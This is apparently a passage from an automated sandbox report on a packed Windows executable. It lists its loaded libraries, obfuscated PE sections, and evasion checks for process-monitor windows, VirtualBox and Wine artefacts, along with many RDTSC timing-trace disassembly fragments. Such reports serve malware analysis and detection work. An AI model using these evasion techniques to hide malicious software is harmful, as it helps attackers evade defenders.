                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: version.dll
                Source: 6GNqkkKY0j.exe | Static file information: File size 2894848 > 1048576
                Source: 6GNqkkKY0j.exe | Static PE information: Raw size of ubzvudki is bigger than: 0x100000 < 0x299000

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Unpacked PE file: 0.2.6GNqkkKY0j.exe.2f0000.0.unpack :EW;.rsrc :W;.idata :W;ubzvudki:EW;webyiwwz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ubzvudki:EW;webyiwwz:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: 6GNqkkKY0j.exe | Static PE information: real checksum: 0x2c42ff should be: 0x2c6750
                Source: 6GNqkkKY0j.exe | Static PE information: section name:
                Source: 6GNqkkKY0j.exe | Static PE information: section name: .rsrc
                Source: 6GNqkkKY0j.exe | Static PE information: section name: .idata
                Source: 6GNqkkKY0j.exe | Static PE information: section name: ubzvudki
                Source: 6GNqkkKY0j.exe | Static PE information: section name: webyiwwz
                Source: 6GNqkkKY0j.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F6637 push 00000074h; retf 0_3_013F6646
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F7127 push esp; retf 0_3_013F7136
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F7117 push esp; retf 0_3_013F7126
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F70BB push ecx; retf 0_3_013F70C2
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F70AF push esp; retf 0_3_013F7116
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F70A0 push ecx; retf 0_3_013F70AE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Code function: 0_3_013F70F3 push esp; retf 0_3_013F7116
                Source: 6GNqkkKY0j.exe | Static PE information: section name: entropy: 7.980471642795688

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | RDTSC instruction interceptor: First address: 349566 second address: 348E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F0FE0B8ED45h 0x0000000d nop 0x0000000e cmc 0x0000000f push dword ptr [ebp+122D1549h] 0x00000015 jmp 00007F0FE0B8ED43h 0x0000001a call dword ptr [ebp+122D2183h] 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D219Dh], edi 0x00000027 xor eax, eax 0x00000029 ja 00007F0FE0B8ED3Ch 0x0000002f mov dword ptr [ebp+122D36DCh], ebx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 mov dword ptr [ebp+122D36DCh], edx 0x0000003f mov dword ptr [ebp+122D3A0Fh], eax 0x00000045 jmp 00007F0FE0B8ED45h 0x0000004a jmp 00007F0FE0B8ED3Fh 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D20C2h], edi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e cmc 0x0000005f lodsw 0x00000061 pushad 0x00000062 sub dword ptr [ebp+122D208Fh], esi 0x00000068 popad 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F0FE0B8ED3Ch 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov eax, dword ptr [ebp+122D3CDBh] 0x0000007d mov edx, dword ptr [ebp+122D3AFFh] 0x00000083 popad 0x00000084 jmp 00007F0FE0B8ED42h 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e push edi 0x0000008f pop edi 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4ED798 second address: 4ED79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4A5A65 second address: 4A5A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0FE14B0506h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4A5A88 second address: 4A5A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4AF904 second address: 4AF92A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F0FE14B0506h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0FE14B0516h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4AF92A second address: 4AF930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4AF930 second address: 4AF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4AF936 second address: 4AF93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F0931 second address: 4F0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F0935 second address: 4F0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE0B8ED3Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F0947 second address: 4F099B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0FE14B0508h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov esi, 73109ED1h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d sub esi, 2D6D459Eh 0x00000033 push eax 0x00000034 pushad 0x00000035 push ebx 0x00000036 jmp 00007F0FE14B050Eh 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F13DA second address: 4F1430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D20E2h] 0x0000000f push 00000000h 0x00000011 call 00007F0FE0B8ED48h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F0FE0B8ED38h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F1430 second address: 4F1434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F1434 second address: 4F143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F143A second address: 4F1447 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F238F second address: 4F2393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F2E2D second address: 4F2E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F2E32 second address: 4F2E3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0FE0B8ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F2E3C second address: 4F2E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0FE14B0508h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D2D09h], ecx 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c push ebx 0x0000002d adc di, A0A0h 0x00000032 pop edi 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 xor dword ptr [ebp+122D27DCh], edi 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F2E89 second address: 4F2E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F3578 second address: 4F357C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F357C second address: 4F358A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F358A second address: 4F3594 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0FE14B050Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F3594 second address: 4F35A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F6CE7 second address: 4F6D06 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE14B050Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0FE14B050Ch 0x00000013 jc 00007F0FE14B0506h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F35A0 second address: 4F35A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F6D06 second address: 4F6D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F6D0B second address: 4F6D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F6D11 second address: 4F6D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0FE14B0508h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+12447775h], esi 0x0000002a push esi 0x0000002b or dword ptr [ebp+1245993Fh], ecx 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F0FE14B0508h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push edi 0x0000004f pop edi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jnc 00007F0FE14B0514h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F6D84 second address: 4F6D99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F0FE0B8ED40h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FA52E second address: 4FA54F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0FE14B050Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F755D second address: 4F7561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F7561 second address: 4F757B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FBDDE second address: 4FBDE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F757B second address: 4F7597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4F7597 second address: 4F759C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FDF1B second address: 4FDF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FDF1F second address: 4FDF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FDF25 second address: 4FDF2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FCE8D second address: 4FCE93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FE01E second address: 4FE03F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FE11A second address: 4FE11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 500037 second address: 50003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50003C second address: 5000C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0FE0B8ED38h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 or edi, dword ptr [ebp+122D29ECh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0FE0B8ED38h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 jmp 00007F0FE0B8ED42h 0x0000004d push 00000000h 0x0000004f xor edi, 780CA11Ch 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b jmp 00007F0FE0B8ED45h 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5000C2 second address: 5000C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5000C7 second address: 5000D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4FF1B7 second address: 4FF272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push dword ptr fs:[00000000h] 0x0000000d jmp 00007F0FE14B0514h 0x00000012 jmp 00007F0FE14B050Ah 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e jmp 00007F0FE14B0515h 0x00000023 mov ebx, ecx 0x00000025 mov eax, dword ptr [ebp+122D0D39h] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F0FE14B0508h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+12454115h] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F0FE14B0508h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000017h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 stc 0x00000068 mov ebx, dword ptr [ebp+122D27D8h] 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push ebx 0x00000072 jmp 00007F0FE14B0517h 0x00000077 pop ebx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50027F second address: 500285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 500285 second address: 5002A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0FE14B0506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F0FE14B050Ah 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5002A3 second address: 5002A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 502213 second address: 502217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 504FF7 second address: 504FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4B2E42 second address: 4B2E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4B2E4A second address: 4B2E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5074A5 second address: 5074E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0512h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, ecx 0x0000000f movsx ebx, dx 0x00000012 push 00000000h 0x00000014 xor bx, EE14h 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D37CDh], ebx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0FE14B050Ch 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50A5B8 second address: 50A5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50A5CB second address: 50A5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F0FE14B050Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50A5E3 second address: 50A5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE0B8ED3Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50AC11 second address: 50AC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5041AD second address: 5041B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5041B1 second address: 5041B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5041B7 second address: 5041BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
